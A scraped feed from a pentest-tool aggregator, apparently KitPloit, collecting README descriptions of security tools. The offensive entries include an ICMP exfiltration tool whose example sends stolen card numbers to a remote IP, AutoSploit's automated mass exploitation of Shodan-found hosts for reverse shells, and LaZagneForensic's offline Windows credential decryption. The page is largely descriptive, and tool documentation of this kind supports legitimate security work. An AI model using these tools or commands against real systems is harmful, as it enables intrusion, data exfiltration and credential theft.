Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5854 articles
Browse latest View live

Minesweeper - A Burpsuite plugin (BApp) to aid in the detection of cryptocurrency mining domains (cryptojacking)

$
0
0
A Burpsuite plugin (BApp) to aid in the detection of scripts being loaded from over 3200 malicious cryptocurrency mining domains (cryptojacking).
Contributions are more than welcome!

Summary
Minesweeper will passively scan in-scope items looking for matches against more than 3000 known cryptojacking domains within the source of pages. When discovered, an alert similar to the following will be raised:


Manually Updating Sources
As this is the first build of Minesweeper lists are currently built based on CoinBlockerLists. As the project matures more sources will be added, as well as direct code checks. Since CoinBlockerLists updates quite frequently code is included to allow you to manually update your source list from the CoinBlockerLists github project.
If you don't wish to wait for the next build of the plugin and want to update your own sources you can use the following in the root of your cloned project:
$ ./lib/update_sources.py
This should produce an output similar to the following on a successful update:




ICMPExfil - Exfiltrate data with ICMP

$
0
0

ICMP Exfil allows you to transmit data via valid ICMP packets. You use the client script to pass in data you wish to exfiltrate, then on the device you're transmitting to you run the server. Anyone watching-- human or security system-- will just see valid ICMP packets, there's nothing malicious about the structure of the packets. Your data isn't hidden inside the ICMP packets either, so looking at the packet doesn't tell you what was exfiltrated.

Author
Martino Jones, martinojones.com.

ASCII
Right now, the only thing I've added support for is ASCII characters. You will be able to exfiltrate anything that can be represented in ASCII characters (e.g. letters and numbers). For example: you borrowed some cool 16 digit numbers, well you'd use the client script to pass those numbers to your server by doing ./ping.py --ascii "4111111111111111".

Sending to server
You have two options for setting the server to send to. You can either use the --ip or you can set the default IP in the script called ipToPing.

Wait
If you want to be a little more patient, and make it harder for people to notice you're exfiltrating data you can use --wait to specify the amount of min time + the time that's supposed to pass for the data to transfer. This is still being worked on... so you'll need to do this conversion yourself, but shouldn't take long for me to add... also doesn't matter too much since most people and security systems don't even detect this yet.

Verbose
If you would like to see the pings going through you can use the --show.

Start/Stop Server
When you want to start the server you just do sudo python3 server.py. You don't need to do anything else. When you're done, you just need to do Control+C. Right now the server needs work, it needs to map the input based on who they recived the data from, right now I only have it tested with one client pinging the server, this of course needs to be tuned. The groundwork is already there, just need to get the reset put together.

Example
I found a database full of these cool 16 digit numbers, I need to save them for futher research so I save them to a file called file:
Command:
./ping.py --ip 1.2.3.4 --asciiFile file

File Content:
4587965312457852 01/15 456 Martino Jones | 4567965382457452 03/16 236 Martino Joe

Encoded Data:
['0110100', '0110101', '0111000', '0110111', '0111001', '0110110', '0110101', '0110011', '0110001', 
'0110010', '0110100', '0110101', '0110111', '0111000', '0110101', '0110010', '0100000', '0110000',
'0110001', '0101111', '0110001', '0110101', '0100000', '0110100', '0110101', '0110110', '0100000',
'1001101', '1100001', '1110010', '1110100', '1101001', '1101110', '1101111', '0100000', '1001010',
'1101111', '1101110', '1100101', '1110011', '0100000', '1111100', '0100000', '0110100', '0110101',
'0110110', '0110111', '0111001', '0110110', '0110101', '0110011', '0111000', '0110010', '0110100',
'0110101', '0110111', '0110100', '0110101', '0110010', '0100000', '0110000', '0110011', '0101111',
'0110001', '0110110', '0100000', '0110010', '0110011', '0110110', '0100000', '1001101', '1100001',
'1110010', '1110100', '1101001', '1101110', '1101111', '0100000', '1001010', '1101111', '1100101',
'0001010']

 Server:
Calculating offsets

4 5 8 7 9 6 5 3 1 2 4 5 7 8 5 2 0 1 / 1 5 4 5 6 M a r t i n o J o n e s | 4 5 6 7 9 6 5 3 8 2 4 5 7 4 5 2 0 3 / 1 6 2 3 6 M a r t i n o J o e


LSB-Steganography - Python program to steganography files into images using the Least Significant Bit

$
0
0

Python program based on stegonographical methods to hide files in images using the Least Significant Bit technique.
I used the most basic method which is the least significant bit. A colour pixel is composed of red, green and blue, encoded on one byte. The idea is to store information in the first bit of every pixel's RGB component. In the worst case, the decimal value is different by one which is not visible to the human eye. In practice, if you don't have space to store all of your data in the first bit of every pixel you should start using the second bit, and so on. You have to keep in mind that the more your store data in an image, the more it can be detected.

Information
LSBSteg module is based on OpenCV to hide data in images. It uses the first bit of every pixel, and every colour of an image. The code is quite simple to understand; If every first bit has been used, the module starts using the second bit, so the larger the data, the more the image is altered. The program can hide all of the data if there is enough space in the image. The main functions are:
  • encode_text: You provide a string and the program hides it
  • encode_image: You provide an OpenCV image and the method iterates for every pixel in order to hide them. A good practice is to have a carrier 8 times bigger than the image to hide (so that each pixel will be put only in the first bit).
  • encode_binary: You provide a binary file to hide; This method can obfuscate any kind of file.
Only images without compression are supported, namely not JPEG as LSB bits might get tampered during the compression phase.

Installation
This tool only require OpenCV and its dependencies.
pip install -r requirements.txt

Usage
LSBSteg.py

Usage:
LSBSteg.py encode -i <input> -o <output> -f <file>
LSBSteg.py decode -i <input> -o <output>

Options:
-h, --help Show this help
--version Show the version
-f,--file=<file> File to hide
-i,--in=<input> Input image (carrier)
-o,--out=<output> Output image (or extracted file)

Python module
Text encoding:
#encoding
steg = LSBSteg(cv2.imread("my_image.png"))
img_encoded = steg.encode_text("my message")
cv2.imwrite("my_new_image.png", img_encoded)

#decoding
im = cv2.imread("my_new_image.png")
steg = LSBSteg(im)
print("Text value:",steg.decode_text())
Image steganography:
#encoding
steg = LSBSteg(cv2.imread("carrier.png")
new_im = steg.encode_image(cv2.imread("secret_image.jpg"))
cv2.imwrite("new_image.png", new_im)

#decoding
steg = LSBSteg("new_image.png")
orig_im = steg.decode_image()
cv.SaveImage("recovered.png", orig_im)
Binary steganography:
#encoding
steg = LSBSteg(cv2.imread("carrier.png"))
data = open("my_data.bin", "rb").read()
new_img = steg.encode_binary(data)
cv2.imwrite("new_image.png", new_img)

#decoding
steg = LSBSteg(cv2.imread("new_image.png"))
binary = steg.decode_binary()
with open("recovered.bin", "rb") as f:
f.write(data)

IDAsec - IDA plugin for reverse-engineering and dynamic interactions with the Binsec platform

$
0
0

IDA plugin for reverse-engineering and dynamic interactions with the Binsec platform

Features
  • Decoding an instruction (in DBA IR)
  • Loading execution traces generated by Pinsec
  • Triggering analyzes on Binsec and retrieving results

Dependencies
  • protobuf
  • ZMQ
  • capstone (for trace disassembly)
  • graphviz (to draw dependency within a formula)
  • pyparsing
  • enum
  • path.py
  • plotly (optional)

Running Idasec
  1. In IDA: Copy the idasec folder in the python directory of IDA and then load idasec.py with Ctrl+F7
  2. As a standalone app, just run ./idasec.py (no yet ready)

Screenshots




DVWA - Damn Vulnerable Web Application

$
0
0

Damn Vulnerable Web Application (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goal is to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and to aid both students & teachers to learn about web application security in a controlled class room environment.

The aim of DVWA is to practice some of the most common web vulnerabilities, with various levels of difficulty, with a simple straightforward interface. Please note, there are both documented and undocumented vulnerabilities with this software. This is intentional. You are encouraged to try and discover as many issues as possible.

WARNING!
Damn Vulnerable Web Application is damn vulnerable! Do not upload it to your hosting provider's public html folder or any Internet facing servers, as they will be compromised. It is recommended using a virtual machine (such as VirtualBox or VMware), which is set to NAT networking mode. Inside a guest machine, you can download and install XAMPP for the web server and database.

Download and install as a docker container
Please ensure you are using aufs due to previous MySQL issues. Run docker info to check your storage driver. If it isn't aufs, please change it as such. There are guides for each operating system on how to do that, but they're quite different so we won't cover that here.

Download
DVWA is available either as a package that will run on your own web server or as a Live CD:
  • DVWA v1.9 Source (Stable) - [1.3 MB] Download ZIP - Released 2015-10-05
  • DVWA v1.0.7 LiveCD - [480 MB] Download ISO - Released 2010-09-08
  • DVWA Development Source (Latest) Download ZIP // git clone https://github.com/ethicalhack3r/DVWA

Installation
Please make sure your config/config.inc.php file exists. Only having a config.inc.php.dist will not be sufficient and you'll have to edit it to suit your environment and rename it to config.inc.php. Windows may hide the trailing extension.

Installation Videos




Windows + XAMPP
The easiest way to install DVWA is to download and install XAMPP if you do not already have a web server setup.
XAMPP is a very easy to install Apache Distribution for Linux, Solaris, Windows and Mac OS X. The package includes the Apache web server, MySQL, PHP, Perl, a FTP server and phpMyAdmin.
XAMPP can be downloaded from: https://www.apachefriends.org/en/xampp.html
Simply unzip dvwa.zip, place the unzipped files in your public html folder, then point your browser to: http://127.0.0.1/dvwa/setup.php

Linux Packages
If you are using a Debian based Linux distribution, you will need to install the following packages (or their equivalent):
apt-get -y install apache2 mysql-server php php-mysqli php-gd

Database Setup
To set up the database, simply click on the Setup DVWA button in the main menu, then click on the Create / Reset Database button. This will create / reset the database for you with some data in.
If you receive an error while trying to create your database, make sure your database credentials are correct within ./config/config.inc.php. This differs from config.inc.php.dist, which is an example file.
The variables are set to the following by default:
$_DVWA[ 'db_user' ] = 'root';
$_DVWA[ 'db_password' ] = 'p@ssw0rd';
$_DVWA[ 'db_database' ] = 'dvwa';
Note, if you are using MariaDB rather than MySQL (MariaDB is default in Kali), then you can't use the database root user, you must create a new database user. To do this, connect to the database as the root user then use the following commands:
mysql> create database dvwa;
Query OK, 1 row affected (0.00 sec)

mysql> grant all on dvwa.* to dvwa@localhost identified by 'xxx';
Query OK, 0 rows affected, 1 warning (0.01 sec)

mysql> flush privileges;
Query OK, 0 rows affected (0.00 sec)

Other Configuration
Depending on your Operating System as well as version of PHP, you may wish to alter the default configuration. The location of the files will be different on a per-machine basis.
Folder Permissions:
  • ./hackable/uploads/ - Needs to be writable by the web service (for File Upload).
  • ./external/phpids/0.6/lib/IDS/tmp/phpids_log.txt - Needs to be writable by the web service (if you wish to use PHPIDS).
PHP configuration:
  • allow_url_include = on - Allows for Remote File Inclusions (RFI) [allow_url_include]
  • allow_url_fopen = on - Allows for Remote File Inclusions (RFI) [allow_url_fopen]
  • safe_mode = off - (If PHP <= v5.4) Allows for SQL Injection (SQLi) [safe_mode]
  • magic_quotes_gpc = off - (If PHP <= v5.4) Allows for SQL Injection (SQLi) [magic_quotes_gpc]
  • display_errors = off - (Optional) Hides PHP warning messages to make it less verbose [display_errors]
File: config/config.inc.php:

Default Credentials
Default username = admin
Default password = password
...can easily be brute forced ;)
Login URL: http://127.0.0.1/dvwa/login.php

Troubleshooting
For the latest troubleshooting information please visit: https://github.com/ethicalhack3r/DVWA/issues
+Q. SQL Injection won't work on PHP v5.2.6.
-A.If you are using PHP v5.2.6 or above you will need to do the following in order for SQL injection and other vulnerabilities to work.
In .htaccess:
Replace (please note it may say mod_php7):
<IfModule mod_php5.c>
php_flag magic_quotes_gpc off
#php_flag allow_url_fopen on
#php_flag allow_url_include on
</IfModule>
With:
<IfModule mod_php5.c>
magic_quotes_gpc = Off
allow_url_fopen = On
allow_url_include = On
</IfModule>
+Q. Command Injection won't work.
-A. Apache may not have high enough privileges to run commands on the web server. If you are running DVWA under Linux make sure you are logged in as root. Under Windows log in as Administrator.

Links
Homepage: http://www.dvwa.co.uk/
Project Home: https://github.com/ethicalhack3r/DVWA
Created by the DVWA team


Stacer - Linux System Optimizer and Monitoring

$
0
0

Linux System Optimizer And Monitoring.

Required Packages
  • curl
  • systemd

Debian x64
  1. Download stacer_1.0.8_amd64.deb from the Stacer releases page.
  2. Run sudo dpkg -i stacer*.deb on the downloaded package.
  3. Launch Stacer using the installed stacer command.

Fedora x64
  1. Download stacer_1.0.8_x64.rpm from the Stacer releases page.
  2. Run sudo rpm --install stacer*.rpm on the downloaded package.
  3. Launch Stacer using the installed stacer command.

Build from source with CMake (Qt Version Qt 5.9)
$ mkdir build && cd build
$ cmake -DCMAKE_BUILD_TYPE=Release -DCMAKE_PREFIX_PATH=/qt/path/bin -G Ninja ..
$ ninja
$ output/bin/stacer

Screenshots














CFC - Linux Centralized Firewall Control

$
0
0

Centralized firewall control provides a centralized way to manage the firewall on multiple servers or loadbalancers running iptables. This way you can quickly allow/block/del/search abuse ranges etc. with one command on several servers. It accesses those servers through ssh.
It supports both IPv4 and IPv6.
Tested on Debian 6.x / 7.x / 8.x / 9.x, but should work on any distro.

Prerequisites
To use the 'precheck', 'protected' and 'findip' functions for IPv6, you need the 'netaddr' python module installed. The IPv4 does not need that since it uses prefix matching on the binary form of the IP.
Debian: apt-get install python3-netaddr
It's more efficient to use 'ipset' in addition to iptables. Ipset can be used to manage lists that iptables can refer to and use. This works faster and manipulation of the list is also more flexible and the preferred method of using this script.
Debian: apt-get install ipset
Since this script connects to the given servers with ssh, such access must be present before it can be used.

Settings
Copy the example config from cfc.cfg-example to cfc.cfg the first time.
The following settings can be set in the config file:
  • action: sets the action when adding a rule, default: DROP
  • checkaggrbin: path to the checkaggr.py script, default: ./checkaggr.py
  • cleanupconfirmation: asks for confirmation before running the clean command, set to false for cron usage, default: true
  • date: set the date format for the firewall comments, default: $(date +%d%m%Y) -> 22062016
  • dateipset: set the date format for the ipset firewall comments, leave this on the default to avoid breaking some of the functions, default: $(date +%Y%m%d) -> 20160622
  • ipsetname: sets the IPSET list name, default: blockedips
  • ipsetservers: sets the servers that use IPSET instead of iptables, default: "lvs05.example.com lvs06.example.com"
  • fwchain: name of the firewall chain to add/del/search, default: INPUT
  • masklimit: max size of the ip ranges that can be added, default: /21
  • precheck: check if the ip that is about to be added is already in the firewall or part of a larger added range, might be a bit slow on large firewalls on IPv6 (~25 sec. for searching 500 ip ranges per server), default: true
  • protected: enable the added protected ranges, default: true
  • protectedranges: ip ranges that are excluded from the 'add' function, usually the ranges owned by the local network, default: "172.16.0.0/12 10.0.0.0/8 192.168.0.0/16"
  • pythonbin: location of the used Python binary, default: /usr/bin/python3
  • servers: sets the servers that use iptables only, default: "lvs01.example.com lvs02.example.com lvs03.example.com lvs04.example.com"
  • The IPv6 functions are marked with the '6' suffix

Usage
When entering IPs/ranges with the following commands, do so in CIDR notation, this gets validated and won't accept anything else.
    add:
    cfc.sh add n.n.n.n/NN '<optional comment>'
    cfc6.sh add <IPv6_address_range> '<optional comment>'
    Adds the given IP(range) to the firewalls with the configured action for all traffic from that source. Makes a comment by default with the current date, you can add an optional comment using single quotes to add a reason or owner of that range as an example. It can also be searched on that comment later on.

    clean:
    cfc.sh clean <older_than_number_of_days>
    Cleans all the CFC firewall rules older than n amount of days. Keep in mind that it depends on the default date format! So if you customized the date format, you will need to adjust the script in the 'clean' section.

    del:
    cfc.sh del n.n.n.n/NN
    cfc6.sh del <IPv6_address_range>
    Deletes the given IP(range)/rule from the firewalls

    find:
    cfc.sh find <string>
    cfc6.sh find <string>
    Searches the firewalls for the given string (case in-sensitive), this can be (part of) an IP / range / comment

    findip:
    cfc.sh findip n.n.n.n/NN
    cfc6.sh findip <IPv6_address_range>
    Searches the firewalls if the given IP(range) is already part of an added rule, might be a bit slow on large firewalls for IPV6 (~25 sec. for searching 500 ip ranges per server). IPv4 uses prefix matching on the binary form of the IP instead which is roughly 500% faster, this is also used for the precheck and protectedranges features.

    ipsethostinit:
    cfc.sh ipsethostinit <server_name>
    cfc6.sh ipsethostinit <server_name>
    Adds an IPSET list to the specified host and an iptables rule referring to it using the parameters defined in the cfc.cfg. This only needs to be done once before adding firewall rules.

    last:
    cfc.sh last <nr_of_most_recent_rules>
    cfc6.sh last <nr_of_most_recent_rules>
    Shows the last entries added to the firewalls


    AutoSploit - Automated Mass Exploiter

    $
    0
    0

    As the name might suggest AutoSploit attempts to automate the exploitation of remote hosts. Targets are collected automatically as well by employing the Shodan.io API. The program allows the user to enter their platform specific search query such as; Apache, IIS, etc, upon which a list of candidates will be retrieved.
    After this operation has been completed the 'Exploit' component of the program will go about the business of attempting to exploit these targets by running a series of Metasploit modules against them. Which Metasploit modules will be employed in this manner is determined by programatically comparing the name of the module to the initial search query. However, I have added functionality to run all available modules against the targets in a 'Hail Mary' type of attack as well.
    The available Metasploit modules have been selected to facilitate Remote Code Execution and to attempt to gain Reverse TCP Shells and/or Meterpreter sessions. Workspace, local host and local port for MSF facilitated back connections are configured through the dialog that comes up before the 'Exploit' component is started.

    Operational Security Consideration
    Receiving back connections on your local machine might not be the best idea from an OPSEC standpoint. Instead consider running this tool from a VPS that has all the dependencies required, available.

    Usage
    Clone the repo.
    git clone https://github.com/NullArray/AutoSploit.git

    After which it can be started from the terminal with python autosploit.py. After which you can select one of five actions. Please see the option summary below.
    +------------------+----------------------------------------------------+
    | Option | Summary |
    +------------------+----------------------------------------------------+
    |1. Usage | Display this informational message. |
    |2. Gather Hosts | Query Shodan for a list of platform specific IPs. |
    |3. View Hosts | Print gathered IPs/RHOSTS. |
    |4. Exploit | Configure MSF and Start exploiting gathered targets|
    |5. Quit | Exits AutoSploit. |
    +------------------+----------------------------------------------------+

    Available Modules
    The Metasploit modules available with this tool are selected for RCE. You can find them in the modules.txt file that is included in this repo. Should you wish to add more or other modules please do so in the following format.
    use exploit/linux/http/netgear_wnr2000_rce;exploit -j; 
    With each new module on it's own line.

    Dependencies
    AutoSploit depends on the following Python2.7 modules.
    shodan
    blessings
    Should you find you do not have these installed get them with pip like so.
    pip install shodan
    pip install blessings
    Since the program invokes functionality from the Metasploit Framework you need to have this installed also. Get it from Rapid7 by clicking here.

    Note
    While this isn't exactly a Beta release it is an early release nonetheless as such the tool might be subject to changes in the future. If you happen to encounter a bug or would like to contribute to the tool's improvement please feel free to Open a Ticket or Submit a Pull Request
    Thanks.



    LaZagneForensic - Decrypt Windows Credentials From Another Host

    $
    0
    0
    LaZagne uses an internal Windows API called CryptUnprotectData to decrypt user passwords. This API should be called on the victim user session, otherwise, it does not work. If the computer has not been started (when the analysis is realized on an offline mounted disk), or if we do not want to drop a binary on the remote host, no passwords can be retrieved.
    LaZagneForensic has been created to avoid this problem. This work has been mainly inspired by the awesome work done by Jean-Michel Picod for DPAPICK and Francesco Picasso for Windows DPAPI laboratory.

    Note: The main problem is that to decrypt these passwords, the user Windowspasswords is needed.

    Installation
    pip install -r requirements.txt

    Usage

    First way - Dump configuration files from the remote host
    PS C:\Users\test\Desktop> Import-Module .\dump.ps1
    PS C:\Users\test\Desktop> Dump
    Folder dump created successfully !
    python dump.py
    • Launch Lazagne with password if you have it
    python laZagneForensic.py all -remote /tmp/dump -password 'ZapataVive'
    • Launch Lazagne without password
    python laZagneForensic.py all -remote /tmp/dump

    Second way - Mount a disk on your filesystem
    • The file should be mounted on your filesystem
    test:~$ ls /tmp/disk/
    total 769M
    drwxr-xr-x 2 root root 0 févr. 1 14:05 ProgramData
    -rwxr-xr-x 1 root root 256M févr. 1 14:05 swapfile.sys
    -rwxr-xr-x 1 root root 512M févr. 1 14:05 pagefile.sys
    drwxr-xr-x 2 root root 0 janv. 31 00:35 System Volume Information
    dr-xr-xr-x 2 root root 0 janv. 26 10:17 Program Files (x86)
    dr-xr-xr-x 2 root root 0 janv. 25 18:13 Program Files
    drwxr-xr-x 2 root root 0 janv. 19 10:09 Windows
    drwxr-xr-x 2 root root 0 janv. 16 15:52 Homeware
    drwxr-xr-x 2 root root 0 janv. 9 17:33 PerfLogs
    drwxr-xr-x 2 root root 0 nov. 22 20:37 Recovery
    drwxr-xr-x 2 root root 4,0K nov. 22 20:31 Documents and Settings
    dr-xr-xr-x 2 root root 0 nov. 22 20:31 Users
    • Launch Lazagne with password if you have it
    python laZagneForensic.py all -local /tmp/disk -password 'ZapataVive'
    • Launch Lazagne without password
    python laZagneForensic.py all -local /tmp/disk
    Note: Use -v for verbose mode and -vv for debug mode.

    Supported software
    Note: Check the following image to understand which passwords you could decrypt without needed the user windows password. All credentials found will be tested as Windows password in case of the user re-uses the same password.



    Recommended articles related to DPAPI


    Grouper - A PowerShell script for helping to find vulnerable settings in AD Group Policy

    $
    0
    0

    Grouper is a slightly wobbly PowerShell module designed for pentesters and redteamers (although probably also useful for sysadmins) which sifts through the (usually very noisy) XML output from the Get-GPOReport cmdlet (part of Microsoft's Group Policy module) and identifies all the settings defined in Group Policy Objects (GPOs) that might prove useful to someone trying to do something fun/evil.

    Examples of the kinds of stuff it finds in GPOs:
    • GPOs which grant modify permissions on the GPO itself to non-default users.
    • Startup and shutdown scripts
      • arguments and script themselves often include creds.
      • scripts are often stored with permissions that allow you to modify them.
    • MSI installers being automatically deployed
      • again, often stored somewhere that will grant you modify permissions.
    • Good old fashioned Group Policy Preferences passwords.
    • Autologon registry entries containing credentials.
    • Other creds being stored in the registry for fun stuff like VNC.
    • Scheduled tasks with stored credentials.
      • Also often run stuff from poorly secured file shares.
    • User Rights
      • Handy to spot where admins accidentally granted 'Domain Users' RDP access or those fun rights that let you run mimikatz even without full admin privs.
    • Tweaks to local file permissions
      • Good for finding those machines where the admins just stamped "Full Control" for "Everyone" on "C:\Program Files".
    • File Shares
    • INI Files
    • Environment Variables
    • ... and much more! (well, not very much, but some)
    Yes it's pretty rough, but it saves me an enormous amount of time reading through those awful 150MB HTML GPO reports, and if it works for me it might work for you.
    Note: While some function names might include the word audit, Groper is explicitly NOT meant to be an exhaustive audit for best practice configurations etc. If you want that, you should be using Microsoft SCT and LGPO.exe or something.

    Usage
    Generate a GPO Report on a Windows machine with the Group Policy cmdlets installed. These are installed on Domain Controllers by default, can be installed on Windows clients using RSAT, or can be enabled through the "Add Feature" wizard on Windows servers.
    Get-GPOReport -All -ReportType xml -Path C:\temp\gporeport.xml
    Import the Grouper module.
    Import-Module grouper.ps1
    Run Grouper.
    Invoke-AuditGPOReport -Path C:\temp\gporeport.xml

    Parameters
    There's also a couple of parameters you can mess with that alter which policy settings Grouper will show you:
    -showDisabled
    By default, Grouper will only show you GPOs that are currently enabled and linked to an OU in AD. This toggles that behaviour.
    -Level
    Grouper has 3 levels of filtering you can apply to its output.
    1. Show me all the settings you can.
    2. (Default) Show me only settings that seem 'interesting' but may or may not be vulnerable.
    3. Show me only settings that are definitely a super bad idea and will probably have creds in them or are going to otherwise grant me admin on a host.
    Usage is straightforward. -Level 3, -Level 2, etc.

    Frequently Asked Questions

    I'm on a gig and can't find a domain-joined machine that I have access to with the Group Policy cmdlets installed and I don't want to install them because that's noisy and messy!
    Get-GPOReport works just fine on non-domain-joined machines via runas /netonly. You'll need some low-priv creds but that's to be expected.
    Do like this:
    runas /netonly /user:domain\user powershell.exe
    on a non-domain-joined machine that can communicate with a domain controller.
    Then in the resulting PowerShell session do like this:
    Get-GpoReport -Domain example.com -All -ReportType xml -Path C:\temp\gporeport.xml
    Easy.

    I don't trust you so I don't want to run your skeevy looking script on a domain-joined machine, but I want to try Grouper.
    All Grouper needs to work is PowerShell 2.0 and the xml file output from Get-GPOReport. You can run it on a VM with no network card if you're worried and it'll still work fine.
    That said, it's pretty basic code so it shouldn't be hard to see that it's not doing anything remotely sketchy.

    I think it's dumb that you are relying on the MS Group Policy cmdlets/RSAT for Grouper. You should just write it to directly query the domain or parse the policy files straight out of SYSVOL.
    Short answer: Yep.
    Long answer: Yep, doing one of those things would be better, but there are a couple of things that prevented me from doing them YET.
    Ideally I'd like to parse the policy files straight off SYSVOL, but they are stored in a bunch of different file formats, some are proprietary, they're a real pain to read, and I have neither the time nor the inclination to write a bunch of parsers for them from scratch when Microsoft already provide cmdlets that do the job very nicely.
    In the not-too-distant future I'd like to bake Microsoft's Get-GPOReport into Grouper, so you wouldn't need RSAT at all, but I need to figure out if that's going to be some kind of copyright violation. I also need to figure out how to actually do that thing I just said.

    Questions that I am anticipating

    Grouper is showing me all these settings that aren't vulnerable. WTF BRO FALSE POSITIVE MUCH?
    Grouper is not a vulnerability scanner. Grouper merely filters the enormous amount of fluff and noise in Group Policy reports to show you only the policy settings that COULD be configured in exploitable ways.
    To the extent possible I am working through each of the categories of checks to add in some extra filtering to remove obviously non-vulnerable configurations and reduce the noise levels even further, but Group Policy is extremely flexible and it's pretty difficult to anticipate every possible mistake an admin might make.

    Grouper didn't show me a thing that I know is totally vulnerable in Group Policy. WTF BRO FALSE NEGATIVE MUCH?
    Cool, you just found a way to make Grouper better! Scroll down and you'll see where I've provided a little guide to adding new checks to Grouper.

    I don't have a lab environment and I don't have a GPO report file handy! I'm also very impatient!
    I got your back, kid. There's a test_report.xml in the repo that you can try it out with. It's got a bunch of bad settings in it so you can see what that looks like.
    You'll need to run it with the -showDisabled flag because it's so full of really awful configurations I didn't even want to enable the GPO in a lab environment.


    But wait, how do I figure out which users/computers these policies apply to? Your thing is useless!
    Short Answer: PowerView will do a decent job of this.
    Longer Answer: I'll be trying to add this functionality at some point but in the meantime, shut up and use PowerView.

    I hate one of the checks Grouper does and I never want to see it again.
    Cool, easily fixed.
    Pop open grouper.ps1, find the "$polchecks" array and just comment out the line where that check gets added to the array.
    Done.

    I want to make Grouper better but I can't make sense of your awful spaghetti-code. Help me help you.
    Sure thing, sounds good.
    1. Get some GPOReport xml output that includes the type of policy/setting you want Grouper to be able to find. This may require knocking up a suitable policy in a lab environment.
    2. Find the <GPO> xml object that matches your target policy.
    3. Find the subsection of the xml that matches the info you want to pull out of the policy. Policy settings are divided into either User or Computer policy, so this will usually be in either:
      GPO.Computer.ExtensionData.Extension
      or
      GPO.User.ExtensionData.Extension
    4. Now's the annoying part - the reason this code is such a mess is that each policy setting section is structured differently and they use wildly differing naming conventions, so you're going to need to figure out how your target policy is structured. Good luck?
    5. Here's a skeleton of a check function you can use to get started. Make sure it either doesn't return at all or returns $null if nothing interesting is found.
      Function Get-GPOThing {
      [cmdletbinding()]
      Param (
      [Parameter(Mandatory=$true)][ValidateNotNullOrEmpty()] [System.Xml.XmlElement]$polXML,
      [Parameter(Mandatory=$true)][ValidateSet(1,2,3)][int]$level
      )

      ######
      # Description: Checks for Things.
      # Vulnerable: Description of what it shows if Level -eq 3
      # Interesting: Description of what it shows if Level -eq 2
      # Boring: All Things.
      ######

      $settingsThings = ($polXml.Thing.ExtensionData.Extension.Thing | Sort-Object GPOSettingOrder)

      if ($settingsThings) {
      foreach ($setting in $settingsThings) {
      if ($level -eq 1) {
      $output = @{}
      $output.Add("Name", $setting.Name)
      if ($setting.SettingBoolean) {
      $output.Add("SettingBoolean", $setting.SettingBoolean)
      }
      if ($setting.SettingNumber) {
      $output.Add("SettingNumber", $setting.SettingNumber)
      }
      $output.Add("Type", $setting.Type.InnerText)
      Write-Output $output
      ""
      }
      }
      }
      }
    6. Ctrl-f your way down to "$polchecks" and add it to the array of checks with the others.
    7. Test it out.
    8. If it works, submit a pull request!
    9. If you get stuck, hit me up. I'll try to help if I can scrounge a few minutes together.


      Kali Linux 2018.1 Release - The Best Penetration Testing Distribution

      $
      0
      0

      Kali Linux 2018.1 the first release of 2018, this fine release contains all updated packages and bug fixes since our 2017.3 release last November. This release wasn’t without its challenges–from the Meltdown and Spectre excitement (patches will be in the 4.15 kernel) to a couple of other nastybugs.

      Kernel Updated to 4.14

      Kali Linux 2018.1 has a shiny new 4.14.12 kernel. New kernels always have a lot of new features and the 4.14 kernel is no exception, although two new features really stand out.
      • AMD Secure Memory Encryption Support– Secure Memory Encryption is a feature that will be in newer AMD processors that enables automatic encryption and decryption of DRAM. The addition of this features means that systems will no longer (in theory) be vulnerable to cold-boot attacks because, even with physical access, the memory will be not be readable.
      • Increased Memory Limits– Current (and older) 64-bit processors have a limit of 64 TB of physical address space and 256 TB of virtual address space (VAS), which was sufficient for more than a decade but with some server hardware shipping with 64 TB of memory, the limits have been reached. Fortunately, upcoming processors will enable 5-level paging, support for which is included in the 4.14 kernel. In short, this means that these new processors will support 4 PB of physical memory and 128 PB of virtual memory. That’s right, petabytes.

      Package Updates

      In addition to the updated kernel, are also upgraded a number of packages, including zaproxy, secure-socket-funneling, pixiewps, seclists, burpsuite, dbeaver, and reaver. If you already have a Kali installation, you can easily get the latest version of these tools along with everything else that has been updated:

      apt update && apt full-upgrade

      Note that if you haven’t updated your Kali installation in some time (tsk2), you will like receive a GPG error about the repository key being expired (ED444FF07D8D0BF6). Fortunately, this issue is quickly resolved by running the following as root:

      wget -q -O - https://archive.kali.org/archive-key.asc | apt-key add

      Hyper-V Updates

      For those of you using Hyper-V to run the Kali virtual machines provided by Offensive Security, you will find that the Hyper-V virtual machine is now generation 2, which means it’s now UEFI-based and expanding/shrinking HDD is supported. The Hyper-V integration services are also included, which supports Dynamic Memory, Network Monitoring/Scaling, and Replication.


      GasMask - Information Gathering Tool (OSINT)

      $
      0
      0

      All in one Information gathering tool - OSINT
      Written by: maldevel (twitter)

      Dependencies
      • Python 2.x
      • validators
      • python-whois
      • dnspython
      • requests

      Information Gathering
      • ask
      • bing
      • crt
      • dns
      • dogpile
      • github
      • google
      • googleplus
      • instagram
      • linkedin
      • netcraft
      • pgp
      • reddit
      • reverse dns
      • twitter
      • vhosts
      • virustotal
      • whois
      • yahoo
      • yandex
      • youtube

      Dependencies
      pip install -r requirements.txt

      Usage
          ______           __  ___           __ __
      / ____/___ ______/ |/ /___ ______/ //_/
      / / __/ __ `/ ___/ /|_/ / __ `/ ___/ ,<
      / /_/ / /_/ (__ ) / / / /_/ (__ ) /| |
      \____/\__,_/____/_/ /_/\__,_/____/_/ |_|

      GasMasK - All in one Information gathering tool - OSINT
      Ver. 1.0
      Written by: @maldevel
      https://www.twelvesec.com/

      usage: gasmask.py [-h] -d DOMAIN [-s NAMESERVER] [-x PROXY] [-l LIMIT]
      [-i MODE] [-o BASENAME]

      optional arguments:
      -h, --help show this help message and exit
      -d DOMAIN, --domain DOMAIN
      Domain to search.
      -s NAMESERVER, --server NAMESERVER
      DNS server to use.
      -x PROXY, --proxy PROXY
      Use a proxy server when retrieving results from search engines (eg. '-x http://127.0.0.1:8080')
      -l LIMIT, --limit LIMIT
      Limit the number of search engine results (default: 100) .
      -i MODE, --info MODE Limit information gathering (basic,whois,dns,revdns,vhos ts,google,bing,yahoo,ask,dogpile,yandex,linkedin,twitter,googleplus,youtube,reddit,github,instagram,crt,pgp,netcraft,virustotal).
      -o BASENAME, --output BASENAME
      Output in the four major formats at once (markdown, txt, xml and html).

      Usage Examples
      python gasmask.py -d example.com

      python gasmask.py -d example.com -i whois,dns,revdns

      python gasmask.py -d example.com -i basic,yahoo,github -o myresults/example_com_search_results

      Credits


